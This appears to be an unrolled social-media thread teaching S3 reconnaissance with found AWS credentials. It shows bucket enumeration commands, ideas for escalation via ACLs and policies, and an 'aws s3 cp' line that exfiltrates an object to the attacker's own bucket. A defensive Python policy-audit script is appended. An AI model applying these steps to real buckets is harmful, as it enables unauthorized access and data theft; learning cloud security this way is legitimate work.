gatitohacs 😼
Mar 1 • 10 tweets • 4 min read
So you found #aws creds to an S3, let's do some #cloud #hacking #recon:

👇
First of all, S3 stands for serious summertime sadness
and allows the general operations of:

list
get
put
delete

An S3 is a bucket and within a bucket there are objects. Basically an object can be any file. Objects have keys associated,
and a bucket name must be globally unique and not contain spaces or uppercase letters.
Example:
mrlee.s3.us-west-2.amazonaws.com/mafia/pizza.jpg

The bucket mrlee in the west region with an object pizza.jpg and a key of /mafia/pizza.jpg
So let's see what we can access with
aws s3 ls
aws s3api list-buckets
and then look at the objects of the example bucket (foqne in this case)
[Image: example objects in S3 bucket]
Okay, let's look at access control. It's complicated. In principle access control can be resource based,
via ACL or bucket pawlicy attached to a bucket or an individual object itself, or it can be linked to a user, role, group, etc., respectively.
You can have a look at cloudcat on how to find these pawlicies and display them
github.com/rootcathacking…
Assume we have a bucket policy. To make it more readable you can pipe it and show it as JSON.
Here it would mean that a specific IAM user has the permission to put objects in the bucket if the based check from the department is fulfilled - radical!
[Image: example of bucket policy]
By enumerating all these policies, further escalation might be found (depending on the setup): maybe add your own files, change the ACL file itself, add a policy to a resource, etc.
aws s3 sync might be useful, or it might be pawsible to exfil the bucket to your own s3, something like
aws s3 cp s3://mrlee/datpizza.jpg s3://mypizzanow/
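
An added example, not part of the original thread: a Python review of a bucket policy like the one described above, flagging the grants a bucket owner should check first (anonymous principals, rights to rewrite the policy or ACLs, unconditioned writes). The policy document, account ID, principal names and the department tag condition are constructed placeholders.

```python
import json
from fnmatch import fnmatchcase

# Constructed sample policy: account ID, names and the tag value are placeholders.
SAMPLE_POLICY = json.loads("""{"Version": "2012-10-17", "Statement": [
 {"Sid": "DeptUpload", "Effect": "Allow",
  "Principal": {"AWS": "arn:aws:iam::111122223333:user/example-user"},
  "Action": "s3:PutObject", "Resource": "arn:aws:s3:::example-bucket/*",
  "Condition": {"StringEquals": {"aws:PrincipalTag/department": "finance"}}},
 {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
  "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::example-bucket/*"},
 {"Sid": "OpsAdmin", "Effect": "Allow",
  "Principal": {"AWS": "arn:aws:iam::111122223333:role/example-ops"},
  "Action": ["s3:PutBucketPolicy", "s3:PutObjectAcl"],
  "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"]}
]}""")

# Actions that let a principal change who has access, and plain object writes.
CONTROL = ["s3:putbucketpolicy", "s3:deletebucketpolicy",
           "s3:putbucketacl", "s3:putobjectacl"]
WRITE = ["s3:putobject", "s3:deleteobject"]

def as_list(value):
    # Policy fields may be a single value or a list of values.
    return value if isinstance(value, list) else [value]

def is_public(principal):
    # "*" or {"AWS": "*"} matches every caller.
    if isinstance(principal, dict):
        return "*" in as_list(principal.get("AWS", []))
    return principal == "*"

def grants(statement, names):
    # Action patterns may contain wildcards such as s3:* or s3:Put*.
    patterns = [a.lower() for a in as_list(statement.get("Action", []))]
    return any(fnmatchcase(n, p) for p in patterns for n in names)

def audit(policy):
    """Return (Sid, severity, reason) for Allow statements that need review.
    NotAction and NotPrincipal are not evaluated in this sketch."""
    findings = []
    for st in as_list(policy.get("Statement", [])):
        if st.get("Effect") != "Allow":
            continue
        sid, cond = st.get("Sid", "<no Sid>"), bool(st.get("Condition"))
        if is_public(st.get("Principal")) and not cond:
            findings.append((sid, "HIGH", "any principal, no Condition"))
        if grants(st, CONTROL):
            findings.append((sid, "HIGH", "can rewrite bucket policy or ACLs"))
        elif grants(st, WRITE):
            findings.append((sid, "LOW" if cond else "MEDIUM", "object write"))
    return findings
```

For a real bucket, `aws s3api get-bucket-policy` returns the policy as a JSON string in its `Policy` field; parse that with `json.loads` and pass the result to `audit()`.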
